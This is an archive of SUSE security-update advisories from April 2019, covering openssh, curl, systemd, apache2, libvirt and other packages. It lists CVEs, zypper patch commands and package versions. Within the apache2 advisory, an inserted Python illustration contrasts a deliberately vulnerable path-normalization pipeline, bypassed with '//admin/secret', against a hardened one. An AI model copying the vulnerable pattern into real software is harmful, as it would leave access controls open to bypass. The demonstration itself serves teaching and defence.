   - SUSE Linux Enterprise Point of Sale 11-SP3:
      zypper in -t patch sleposp3-openssh-14016=1
   - SUSE Linux Enterprise Debuginfo 11-SP3:
      zypper in -t patch dbgsp3-openssh-14016=1

Package List:

   - SUSE Linux Enterprise Point of Sale 11-SP3 (i586):
      openssh-6.6p1-41.18.1
      openssh-askpass-gnome-6.6p1-41.18.1
   - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):
      openssh-askpass-gnome-debuginfo-6.6p1-41.18.1
      openssh-debuginfo-6.6p1-41.18.1
      openssh-debugsource-6.6p1-41.18.1

References:

   https://www.suse.com/security/cve/CVE-2019-6109.html
   https://www.suse.com/security/cve/CVE-2019-6111.html
   https://bugzilla.suse.com/1090671
   https://bugzilla.suse.com/1115550
   https://bugzilla.suse.com/1119183
   https://bugzilla.suse.com/1121816
   https://bugzilla.suse.com/1121821
   https://bugzilla.suse.com/1131709


From sle-security-updates at lists.suse.com  Fri Apr 12 04:12:05 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 12 Apr 2019 12:12:05 +0200 (CEST)
Subject: SUSE-SU-2019:0249-2: important: Security update for curl
Message-ID: <20190412101205.CB8C9FCCF@maintenance.suse.de>

SUSE Security Update: Security update for curl
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0249-2
Rating:             important
References:         #1123371 #1123377 #1123378
Cross-References:   CVE-2018-16890 CVE-2019-3822 CVE-2019-3823
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes three vulnerabilities is now available.

Description:

   This update for curl fixes the following issues:

   Security issues fixed:

   - CVE-2019-3823: Fixed a heap out-of-bounds read in the code handling the
     end-of-response for SMTP (bsc#1123378).
   - CVE-2019-3822: Fixed a stack based buffer overflow in the function
     creating an outgoing NTLM type-3 message (bsc#1123377).
   - CVE-2018-16890: Fixed a heap buffer out-of-bounds read in the function
     handling incoming NTLM type-2 messages (bsc#1123371).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-249=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      curl-7.37.0-37.34.1
      curl-debuginfo-7.37.0-37.34.1
      curl-debugsource-7.37.0-37.34.1
      libcurl4-32bit-7.37.0-37.34.1
      libcurl4-7.37.0-37.34.1
      libcurl4-debuginfo-32bit-7.37.0-37.34.1
      libcurl4-debuginfo-7.37.0-37.34.1

References:

   https://www.suse.com/security/cve/CVE-2018-16890.html
   https://www.suse.com/security/cve/CVE-2019-3822.html
   https://www.suse.com/security/cve/CVE-2019-3823.html
   https://bugzilla.suse.com/1123371
   https://bugzilla.suse.com/1123377
   https://bugzilla.suse.com/1123378


From sle-security-updates at lists.suse.com  Fri Apr 12 04:39:29 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 12 Apr 2019 12:39:29 +0200 (CEST)
Subject: SUSE-SU-2019:0054-2: important: Security update for systemd
Message-ID: <20190412103929.13AD6FDF0@maintenance.suse.de>

SUSE Security Update: Security update for systemd
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0054-2
Rating:             important
References:         #1068588 #1071558 #1113665 #1120323
Cross-References:   CVE-2018-15686 CVE-2018-16864 CVE-2018-16865
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that solves three vulnerabilities and has one errata is now available.
Description:

   This update for systemd fixes the following issues:

   * Fix security vulnerabilities CVE-2018-16864 and CVE-2018-16865
     (bsc#1120323): Both issues were memory corruptions via
     attacker-controlled alloca which could have been used to gain root
     privileges by a local attacker.
   * Fix security vulnerability CVE-2018-15686 (bsc#1113665): A vulnerability
     in unit_deserialize of systemd used to allow an attacker to supply
     arbitrary state across systemd re-execution via NotifyAccess. This could
     have been used to improperly influence systemd execution and possibly
     lead to root privilege escalation.
   * Remedy 2048 character line-length limit in systemd-sysctl code that would
     cause parser failures if /etc/sysctl.conf contained lines that exceeded
     this length (bsc#1071558).
   * Fix a bug in systemd's core timer code that would cause timer looping
     under certain conditions, resulting in hundreds of syslog messages being
     written to the journal (bsc#1068588).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-54=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      libgudev-1_0-0-210-116.19.1
      libgudev-1_0-0-32bit-210-116.19.1
      libgudev-1_0-0-debuginfo-210-116.19.1
      libgudev-1_0-0-debuginfo-32bit-210-116.19.1
      libgudev-1_0-devel-210-116.19.1
      libudev-devel-210-116.19.1
      libudev1-210-116.19.1
      libudev1-32bit-210-116.19.1
      libudev1-debuginfo-210-116.19.1
      libudev1-debuginfo-32bit-210-116.19.1
      systemd-210-116.19.1
      systemd-32bit-210-116.19.1
      systemd-debuginfo-210-116.19.1
      systemd-debuginfo-32bit-210-116.19.1
      systemd-debugsource-210-116.19.1
      systemd-devel-210-116.19.1
      systemd-sysvinit-210-116.19.1
      typelib-1_0-GUdev-1_0-210-116.19.1
      udev-210-116.19.1
      udev-debuginfo-210-116.19.1
   - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):
      systemd-bash-completion-210-116.19.1

References:

   https://www.suse.com/security/cve/CVE-2018-15686.html
   https://www.suse.com/security/cve/CVE-2018-16864.html
   https://www.suse.com/security/cve/CVE-2018-16865.html
   https://bugzilla.suse.com/1068588
   https://bugzilla.suse.com/1071558
   https://bugzilla.suse.com/1113665
   https://bugzilla.suse.com/1120323


From sle-security-updates at lists.suse.com  Fri Apr 12 04:40:24 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 12 Apr 2019 12:40:24 +0200 (CEST)
Subject: SUSE-SU-2019:0888-2: important: Security update for apache2
Message-ID: <20190412104024.23C07FDF0@maintenance.suse.de>

SUSE Security Update: Security update for apache2
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0888-2
Rating:             important
References:         #1122839 #1131239 #1131241
Cross-References:   CVE-2018-17199 CVE-2019-0217 CVE-2019-0220
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes three vulnerabilities is now available.

Description:

   This update for apache2 fixes the following issues:

   - CVE-2018-17199: A bug in Apache's "mod_session_cookie" led to an issue
     where the module did not respect a cookie's expiry time. [bsc#1122839]
   - CVE-2019-0220: The Apache HTTP server did not use a consistent strategy
     for URL normalization throughout all of its components. In particular,
     consecutive slashes were not always collapsed. Attackers could
     potentially abuse these inconsistencies to bypass access control
     mechanisms and thus gain unauthorized access to protected parts of the
     service. [bsc#1131241]
   - CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when
     running in a threaded server could have allowed users with valid
     credentials to authenticate using another username, bypassing configured
     access control restrictions. [bsc#1131239]

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
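The normalization mismatch described for CVE-2019-0220 above, as an added Python illustration that is neither Apache httpd nor SUSE code: an access-control check that matches the raw request path sits beside a file handler that collapses consecutive slashes, and a hardened pipeline canonicalizes the path once (collapsing slashes and, going one step beyond the advisory's slash case, resolving "." and ".." segments) before any decision. The protected prefix "/admin/" and the request paths are constructed sample values.

```python
"""Added illustration of the CVE-2019-0220 bug pattern: two server components
that normalize a request path differently, beside a hardened pipeline that
canonicalizes once. Toy code, not Apache httpd source; the policy prefix and
request paths are constructed sample values."""
import posixpath

# Constructed sample policy: everything under /admin/ requires authentication.
PROTECTED_PREFIXES = ("/admin/",)


def collapse_slashes(path: str) -> str:
    """Collapse runs of '/' into one '/', as a file-serving component would."""
    while "//" in path:
        path = path.replace("//", "/")
    return path


def canonicalize(path: str) -> str:
    """One canonical form for every decision: collapse slashes first (normpath
    alone keeps a leading '//'), then resolve '.' and '..' segments."""
    canon = posixpath.normpath(collapse_slashes(path))
    # Request paths are expected to be absolute; re-anchor defensively if not.
    if not canon.startswith("/"):
        canon = "/" + canon
    return canon


def access_control_literal(path: str) -> bool:
    """Weak check: compares the raw path against the policy.
    Returns True when the request is allowed."""
    return not path.startswith(PROTECTED_PREFIXES)


def file_handler_collapsing(path: str) -> str:
    """File-serving component: collapses slashes, so '//admin/secret' and
    '/admin/secret' resolve to the same file."""
    return collapse_slashes(path)


def serve_inconsistent(path: str):
    """Vulnerable pipeline: literal access control, collapsing file handler.
    Returns ('allowed', served_path) or ('denied', None)."""
    if not access_control_literal(path):
        return ("denied", None)
    return ("allowed", file_handler_collapsing(path))


def serve_consistent(path: str):
    """Hardened pipeline: canonicalize once and let both the access-control
    decision and the file handler use that same canonical path."""
    canon = canonicalize(path)
    if canon.startswith(PROTECTED_PREFIXES):
        return ("denied", None)
    return ("allowed", canon)


def needs_review(path: str) -> bool:
    """Detection cue for access-log review: a request whose raw path differs
    from its canonical form carries redundant slashes or dot segments."""
    return canonicalize(path) != path


if __name__ == "__main__":
    for req in ("/admin/secret", "//admin/secret", "/public/index.html"):
        print(f"{req:20} inconsistent={serve_inconsistent(req)} "
              f"consistent={serve_consistent(req)} review={needs_review(req)}")
```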
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-888=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):
      apache2-doc-2.4.16-20.24.1
   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      apache2-2.4.16-20.24.1
      apache2-debuginfo-2.4.16-20.24.1
      apache2-debugsource-2.4.16-20.24.1
      apache2-example-pages-2.4.16-20.24.1
      apache2-prefork-2.4.16-20.24.1
      apache2-prefork-debuginfo-2.4.16-20.24.1
      apache2-utils-2.4.16-20.24.1
      apache2-utils-debuginfo-2.4.16-20.24.1
      apache2-worker-2.4.16-20.24.1
      apache2-worker-debuginfo-2.4.16-20.24.1

References:

   https://www.suse.com/security/cve/CVE-2018-17199.html
   https://www.suse.com/security/cve/CVE-2019-0217.html
   https://www.suse.com/security/cve/CVE-2019-0220.html
   https://bugzilla.suse.com/1122839
   https://bugzilla.suse.com/1131239
   https://bugzilla.suse.com/1131241


From sle-security-updates at lists.suse.com  Fri Apr 12 04:40:57 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 12 Apr 2019 12:40:57 +0200 (CEST)
Subject: SUSE-SU-2019:0936-1: important: Security update for libvirt
Message-ID: <20190412104057.06354FDF0@maintenance.suse.de>

SUSE Security Update: Security update for libvirt
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0936-1
Rating:             important
References:         #1081516 #1102604 #1104662 #1106420 #1108086 #1108395
                    #1112182 #1117058 #1118952 #1120813 #1123642 #1124667
                    #1125665 #1126325 #1127458 #1130129
Cross-References:   CVE-2019-3840
Affected Products:
                    SUSE Linux Enterprise Module for Server Applications 15
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

   An update that solves one vulnerability and has 15 fixes is now available.
Description:

This update for libvirt provides the following fixes:

Security issue fixed:

- CVE-2019-3840: Fixed a null pointer dereference vulnerability in the virJSONValueObjectHasKey function which could have resulted in a remote denial of service via the guest agent (bsc#1127458).

Other issues addressed:

- apparmor: reintroduce upstream lxc mount rules (bsc#1130129).
- hook: encode incoming XML to UTF-8 before passing to lxml etree from string method (bsc#1123642).
- supportconfig: collect rotated logs in /var/log/libvirt/* (bsc#1124667).
- libxl: support Xen's max_grant_frames setting with maxGrantFrames attribute on the xenbus controller (bsc#1126325).
- conf: added new 'xenbus' controller type.
- util: skip RDMA detection for non-PCI network devices (bsc#1112182).
- qemu: don't use CAP_DAC_OVERRIDE capability if non-root (bsc#1125665).
- qemu: fix issues related to restricted permissions on /dev/sev (bsc#1102604).
- apparmor: add support for named profiles (bsc#1118952).
- libxl: save current memory value after successful balloon (bsc#1120813).
- apparmor: Fix ptrace rules (bsc#1117058).
- libxl: Add support for soft reset (bsc#1081516).
- libxl: Fix VM migration on busy hosts (bsc#1108086).
- qemu: Add support for SEV guests (fate#325817).
- util: Don't check for parallel iteration in hash-related functions (bsc#1106420).
- spec: Don't restart libvirt-guests when updating libvirt-client (bsc#1104662).
- Fix virNodeGetSEVInfo API crashing libvirtd on AMD SEV enabled hosts (bsc#1108395).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Server Applications 15:

   zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-936=1

- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:

   zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-936=1

- SUSE Linux Enterprise Module for Basesystem 15:

   zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-936=1

Package List:

- SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64):

   libvirt-4.0.0-9.16.7
   libvirt-admin-4.0.0-9.16.7
   libvirt-admin-debuginfo-4.0.0-9.16.7
   libvirt-client-4.0.0-9.16.7
   libvirt-client-debuginfo-4.0.0-9.16.7
   libvirt-daemon-4.0.0-9.16.7
   libvirt-daemon-config-network-4.0.0-9.16.7
   libvirt-daemon-config-nwfilter-4.0.0-9.16.7
   libvirt-daemon-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-interface-4.0.0-9.16.7
   libvirt-daemon-driver-interface-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-lxc-4.0.0-9.16.7
   libvirt-daemon-driver-lxc-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-network-4.0.0-9.16.7
   libvirt-daemon-driver-network-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-nodedev-4.0.0-9.16.7
   libvirt-daemon-driver-nodedev-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-nwfilter-4.0.0-9.16.7
   libvirt-daemon-driver-nwfilter-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-qemu-4.0.0-9.16.7
   libvirt-daemon-driver-qemu-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-secret-4.0.0-9.16.7
   libvirt-daemon-driver-secret-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-storage-4.0.0-9.16.7
   libvirt-daemon-driver-storage-core-4.0.0-9.16.7
   libvirt-daemon-driver-storage-core-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-storage-disk-4.0.0-9.16.7
   libvirt-daemon-driver-storage-disk-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-storage-iscsi-4.0.0-9.16.7
   libvirt-daemon-driver-storage-iscsi-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-storage-logical-4.0.0-9.16.7
   libvirt-daemon-driver-storage-logical-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-storage-mpath-4.0.0-9.16.7
   libvirt-daemon-driver-storage-mpath-debuginfo-4.0.0-9.16.7
   libvirt-daemon-driver-storage-scsi-4.0.0-9.16.7
   libvirt-daemon-driver-storage-scsi-debuginfo-4.0.0-9.16.7
   libvirt-daemon-hooks-4.0.0-9.16.7
   libvirt-daemon-lxc-4.0.0-9.16.7
   libvirt-daemon-qemu-4.0.0-9.16.7
   libvirt-debugsource-4.0.0-9.16.7
   libvirt-devel-4.0.0-9.16.7
   libvirt-doc-4.0.0-9.16.7
   libvirt-lock-sanlock-4.0.0-9.16.7
   libvirt-lock-sanlock-debuginfo-4.0.0-9.16.7
   libvirt-nss-4.0.0-9.16.7
   libvirt-nss-debuginfo-4.0.0-9.16.7

- SUSE Linux Enterprise Module for Server Applications 15 (aarch64 x86_64):

   libvirt-daemon-driver-storage-rbd-4.0.0-9.16.7
   libvirt-daemon-driver-storage-rbd-debuginfo-4.0.0-9.16.7

- SUSE Linux Enterprise Module for Server Applications 15 (x86_64):

   libvirt-daemon-driver-libxl-4.0.0-9.16.7
   libvirt-daemon-driver-libxl-debuginfo-4.0.0-9.16.7
   libvirt-daemon-xen-4.0.0-9.16.7

- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):

   libvirt-debugsource-4.0.0-9.16.7
   wireshark-plugin-libvirt-4.0.0-9.16.7
   wireshark-plugin-libvirt-debuginfo-4.0.0-9.16.7

- SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

   libvirt-debugsource-4.0.0-9.16.7
   libvirt-libs-4.0.0-9.16.7
   libvirt-libs-debuginfo-4.0.0-9.16.7

References:

https://www.suse.com/security/cve/CVE-2019-3840.html
https://bugzilla.suse.com/1081516
https://bugzilla.suse.com/1102604
https://bugzilla.suse.com/1104662
https://bugzilla.suse.com/1106420
https://bugzilla.suse.com/1108086
https://bugzilla.suse.com/1108395
https://bugzilla.suse.com/1112182
https://bugzilla.suse.com/1117058
https://bugzilla.suse.com/1118952
https://bugzilla.suse.com/1120813
https://bugzilla.suse.com/1123642
https://bugzilla.suse.com/1124667
https://bugzilla.suse.com/1125665
https://bugzilla.suse.com/1126325
https://bugzilla.suse.com/1127458
https://bugzilla.suse.com/1130129

From sle-security-updates at lists.suse.com Fri Apr 12 07:09:31 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 12 Apr 2019 15:09:31 +0200 (CEST)
Subject: SUSE-SU-2019:0144-2: important: Security update for ghostscript
Message-ID: <20190412130931.BAA55FDF0@maintenance.suse.de>

SUSE Security Update: Security update for ghostscript
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0144-2
Rating:             important
References:         #1122319
Cross-References:   CVE-2019-6116
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for ghostscript to version 9.26a fixes the following issues:

Security issue fixed:

- CVE-2019-6116: subroutines within pseudo-operators must themselves be pseudo-operators (bsc#1122319).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server for SAP 12-SP1:

   zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-144=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   ghostscript-9.26a-23.19.1
   ghostscript-debuginfo-9.26a-23.19.1
   ghostscript-debugsource-9.26a-23.19.1
   ghostscript-x11-9.26a-23.19.1
   ghostscript-x11-debuginfo-9.26a-23.19.1
   libspectre-debugsource-0.2.7-12.6.1
   libspectre1-0.2.7-12.6.1
   libspectre1-debuginfo-0.2.7-12.6.1

References:

https://www.suse.com/security/cve/CVE-2019-6116.html
https://bugzilla.suse.com/1122319

From sle-security-updates at lists.suse.com Fri Apr 12 10:14:01 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 12 Apr 2019 18:14:01 +0200 (CEST)
Subject: SUSE-SU-2019:0940-1: Security update for audiofile
Message-ID: <20190412161401.64A06FD26@maintenance.suse.de>

SUSE Security Update: Security update for audiofile
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0940-1
Rating:             low
References:         #1100523
Cross-References:   CVE-2018-13440
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Desktop Applications 15
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for audiofile fixes the following issues:

Security issue fixed:

- CVE-2018-13440: Return AF_FAIL instead of causing NULL pointer dereferences later (bsc#1100523).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:

   zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-940=1

- SUSE Linux Enterprise Module for Desktop Applications 15:

   zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-940=1

Package List:

- SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):

   audiofile-0.3.6-3.7.10
   audiofile-debuginfo-0.3.6-3.7.10
   audiofile-debugsource-0.3.6-3.7.10
   audiofile-doc-0.3.6-3.7.10

- SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):

   audiofile-debuginfo-0.3.6-3.7.10
   audiofile-debugsource-0.3.6-3.7.10
   audiofile-devel-0.3.6-3.7.10
   libaudiofile1-0.3.6-3.7.10
   libaudiofile1-debuginfo-0.3.6-3.7.10

References:

https://www.suse.com/security/cve/CVE-2018-13440.html
https://bugzilla.suse.com/1100523

From sle-security-updates at lists.suse.com Fri Apr 12 13:10:27 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Fri, 12 Apr 2019 21:10:27 +0200 (CEST)
Subject: SUSE-SU-2019:0941-1: moderate: Security update for openssh
Message-ID: <20190412191027.13406FD26@maintenance.suse.de>

SUSE Security Update: Security update for openssh
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0941-1
Rating:             moderate
References:         #1090671 #1115550 #1119183 #1121816 #1121821
Cross-References:   CVE-2019-6109 CVE-2019-6111
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
                    SUSE Linux Enterprise Server 12-SP1-LTSS
                    SUSE Linux Enterprise Server 12-LTSS
______________________________________________________________________________

An update that solves two vulnerabilities and has three fixes is now available.
Description:

This update for openssh fixes the following issues:

Security vulnerabilities addressed:

- CVE-2019-6109: Fixed a character encoding issue in the progress display of the scp client that could be used to manipulate client output, allowing for spoofing during file transfers (bsc#1121816).
- CVE-2019-6111: Properly validate object names received by the scp client to prevent arbitrary file overwrites when interacting with a malicious SSH server (bsc#1121821).

Other issues fixed:

- Fixed two race conditions in sshd relating to SIGHUP (bsc#1119183).
- Returned proper reason for port forwarding failures (bsc#1090671).
- Fixed SSHD termination of multichannel sessions with non-root users (bsc#1115550).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server for SAP 12-SP1:

   zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-941=1

- SUSE Linux Enterprise Server 12-SP1-LTSS:

   zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-941=1

- SUSE Linux Enterprise Server 12-LTSS:

   zypper in -t patch SUSE-SLE-SERVER-12-2019-941=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   openssh-6.6p1-54.32.1
   openssh-askpass-gnome-6.6p1-54.32.1
   openssh-askpass-gnome-debuginfo-6.6p1-54.32.1
   openssh-debuginfo-6.6p1-54.32.1
   openssh-debugsource-6.6p1-54.32.1
   openssh-fips-6.6p1-54.32.1
   openssh-helpers-6.6p1-54.32.1
   openssh-helpers-debuginfo-6.6p1-54.32.1

- SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):

   openssh-6.6p1-54.32.1
   openssh-askpass-gnome-6.6p1-54.32.1
   openssh-askpass-gnome-debuginfo-6.6p1-54.32.1
   openssh-debuginfo-6.6p1-54.32.1
   openssh-debugsource-6.6p1-54.32.1
   openssh-fips-6.6p1-54.32.1
   openssh-helpers-6.6p1-54.32.1
   openssh-helpers-debuginfo-6.6p1-54.32.1

- SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):

   openssh-6.6p1-54.32.1
   openssh-askpass-gnome-6.6p1-54.32.1
   openssh-askpass-gnome-debuginfo-6.6p1-54.32.1
   openssh-debuginfo-6.6p1-54.32.1
   openssh-debugsource-6.6p1-54.32.1
   openssh-fips-6.6p1-54.32.1
   openssh-helpers-6.6p1-54.32.1
   openssh-helpers-debuginfo-6.6p1-54.32.1

References:

https://www.suse.com/security/cve/CVE-2019-6109.html
https://www.suse.com/security/cve/CVE-2019-6111.html
https://bugzilla.suse.com/1090671
https://bugzilla.suse.com/1115550
https://bugzilla.suse.com/1119183
https://bugzilla.suse.com/1121816
https://bugzilla.suse.com/1121821

From sle-security-updates at lists.suse.com Fri Apr 12 16:09:10 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 13 Apr 2019 00:09:10 +0200 (CEST)
Subject: SUSE-SU-2019:0336-2: important: Security update for MozillaFirefox
Message-ID: <20190412220910.427A6FD26@maintenance.suse.de>

SUSE Security Update: Security update for MozillaFirefox
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0336-2
Rating:             important
References:         #1120374 #1122983
Cross-References:   CVE-2018-18500 CVE-2018-18501 CVE-2018-18505
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes three vulnerabilities is now available.

Description:

This update for MozillaFirefox fixes the following issues:

Security issues fixed:

- CVE-2018-18500: Fixed a use-after-free parsing HTML5 stream (boo#1122983).
- CVE-2018-18501: Fixed multiple memory safety bugs (boo#1122983).
- CVE-2018-18505: Fixed a privilege escalation through IPC channel messages (boo#1122983).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server for SAP 12-SP1:

   zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-336=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   MozillaFirefox-60.5.0esr-109.58.3
   MozillaFirefox-branding-SLE-60-32.5.1
   MozillaFirefox-debuginfo-60.5.0esr-109.58.3
   MozillaFirefox-debugsource-60.5.0esr-109.58.3
   MozillaFirefox-devel-60.5.0esr-109.58.3
   MozillaFirefox-translations-common-60.5.0esr-109.58.3
   libfreebl3-3.41.1-58.25.1
   libfreebl3-32bit-3.41.1-58.25.1
   libfreebl3-debuginfo-3.41.1-58.25.1
   libfreebl3-debuginfo-32bit-3.41.1-58.25.1
   libfreebl3-hmac-3.41.1-58.25.1
   libfreebl3-hmac-32bit-3.41.1-58.25.1
   libsoftokn3-3.41.1-58.25.1
   libsoftokn3-32bit-3.41.1-58.25.1
   libsoftokn3-debuginfo-3.41.1-58.25.1
   libsoftokn3-debuginfo-32bit-3.41.1-58.25.1
   libsoftokn3-hmac-3.41.1-58.25.1
   libsoftokn3-hmac-32bit-3.41.1-58.25.1
   mozilla-nss-3.41.1-58.25.1
   mozilla-nss-32bit-3.41.1-58.25.1
   mozilla-nss-certs-3.41.1-58.25.1
   mozilla-nss-certs-32bit-3.41.1-58.25.1
   mozilla-nss-certs-debuginfo-3.41.1-58.25.1
   mozilla-nss-certs-debuginfo-32bit-3.41.1-58.25.1
   mozilla-nss-debuginfo-3.41.1-58.25.1
   mozilla-nss-debuginfo-32bit-3.41.1-58.25.1
   mozilla-nss-debugsource-3.41.1-58.25.1
   mozilla-nss-devel-3.41.1-58.25.1
   mozilla-nss-sysinit-3.41.1-58.25.1
   mozilla-nss-sysinit-32bit-3.41.1-58.25.1
   mozilla-nss-sysinit-debuginfo-3.41.1-58.25.1
   mozilla-nss-sysinit-debuginfo-32bit-3.41.1-58.25.1
   mozilla-nss-tools-3.41.1-58.25.1
   mozilla-nss-tools-debuginfo-3.41.1-58.25.1

References:

https://www.suse.com/security/cve/CVE-2018-18500.html
https://www.suse.com/security/cve/CVE-2018-18501.html
https://www.suse.com/security/cve/CVE-2018-18505.html
https://bugzilla.suse.com/1120374
https://bugzilla.suse.com/1122983

From sle-security-updates at lists.suse.com Fri Apr 12 16:10:34 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 13 Apr 2019 00:10:34 +0200 (CEST)
Subject: SUSE-SU-2019:0049-2: important: Security update for java-1_7_0-openjdk
Message-ID: <20190412221034.23D54FD26@maintenance.suse.de>

SUSE Security Update: Security update for java-1_7_0-openjdk
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0049-2
Rating:             important
References:         #1101644 #1101645 #1101651 #1101656 #1112142 #1112143 #1112144 #1112146 #1112147 #1112152 #1112153
Cross-References:   CVE-2018-13785 CVE-2018-16435 CVE-2018-2938 CVE-2018-2940 CVE-2018-2952 CVE-2018-2973 CVE-2018-3136 CVE-2018-3139 CVE-2018-3149 CVE-2018-3169 CVE-2018-3180 CVE-2018-3214 CVE-2018-3639
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes 13 vulnerabilities is now available.

Description:

This update for java-1_7_0-openjdk to version 7u201 fixes the following issues:

Security issues fixed:

- CVE-2018-3136: Manifest better support (bsc#1112142)
- CVE-2018-3139: Better HTTP Redirection (bsc#1112143)
- CVE-2018-3149: Enhance JNDI lookups (bsc#1112144)
- CVE-2018-3169: Improve field accesses (bsc#1112146)
- CVE-2018-3180: Improve TLS connections stability (bsc#1112147)
- CVE-2018-3214: Better RIFF reading support (bsc#1112152)
- CVE-2018-13785: Upgrade JDK 8u to libpng 1.6.35 (bsc#1112153)
- CVE-2018-16435: heap-based buffer overflow in SetData function in cmsIT8LoadFromFile
- CVE-2018-2938: Support Derby connections (bsc#1101644)
- CVE-2018-2940: Better stack walking (bsc#1101645)
- CVE-2018-2952: Exception to Pattern Syntax (bsc#1101651)
- CVE-2018-2973: Improve LDAP support (bsc#1101656)
- CVE-2018-3639: CPU speculative store bypass mitigation

Patch Instructions:

